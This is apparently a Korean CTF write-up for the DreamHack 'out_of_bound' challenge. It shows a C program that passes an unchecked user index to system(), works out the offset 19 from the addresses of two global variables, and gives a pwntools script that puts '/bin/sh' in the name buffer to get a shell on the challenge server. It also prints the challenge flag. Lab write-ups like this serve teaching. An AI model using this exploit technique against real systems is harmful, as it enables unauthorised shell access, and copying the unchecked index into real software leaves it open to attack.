[DreamHack] out_of_bound

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>

char name[16];

char *command[10] = {
    "cat",
    "ls",
    "id",
    "ps",
    "file ./oob"
};
void alarm_handler()
{
    puts("TIME OUT");
    exit(-1);
}

void initialize()
{
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

int main()
{
    int idx;

    initialize();

    printf("Admin name: ");
    read(0, name, sizeof(name));
    printf("What do you want?: ");

    scanf("%d", &idx);

    system(command[idx]);

    return 0;
}

간단한 out_of_bound 취약점이 펑펑 터지는 문제이다.

main함수에서는 index를 정수형으로 선언하고, 전역변수로 name에 16의 크기를 주었다.

그리고 read 함수를 통해서 name 크기만큼 입력 받을 수 있다고 한다.

# name Address = 0x0804a0ac

# command Address = 0x0804a060

Name변수와 command의 변수의 주소값은 각각 위와 같다.

name변수에 값을 입력 받고 return값 위까지 4바이트가 더 붙는다.

name = (0x804a0ac + 4) => 8 + 4 = 12bytes + b"/bin/sh" = 4bytes = 16bytes

 

이렇게 16바이트를 채워주고, index의 참조 범위는 p32(px804a060) - p32(0x804a0ac)

 

> 0x08048737 <+108>: mov eax,DWORD PTR [eax*4+0x804a060]

 

eax * 4 + 0x804a060 ==> index Reference / 4 = 19

 

따라서 19만큼을 넣어주면 취약점이 펑펑~

 

from pwn import *

p = remote("host3.dreamhack.games", 19391)
p.recvuntil("Admin name: ")
payload = p32(0x804a0ac + 4) + b"/bin/sh"
p.sendline(payload)
p.recvuntil("What do you want?: ")
p.sendline("19")
p.interactive()

'''
# name Address = 0x0804a0ac
# command Address = 0x0804a060
name = (0x804a0ac + 4) => 8 + 4 = 12bytes + b"/bin/sh" = 4bytes = 16bytes
index Reference = p32(px804a060) - p32(0x804a0ac)

> 0x08048737 <+108>:   mov    eax,DWORD PTR [eax*4+0x804a060]

eax * 4 + 0x804a060 ==> index Reference / 4 = 19

DH{2524e20ddeee45f11c8eb91804d57296}
'''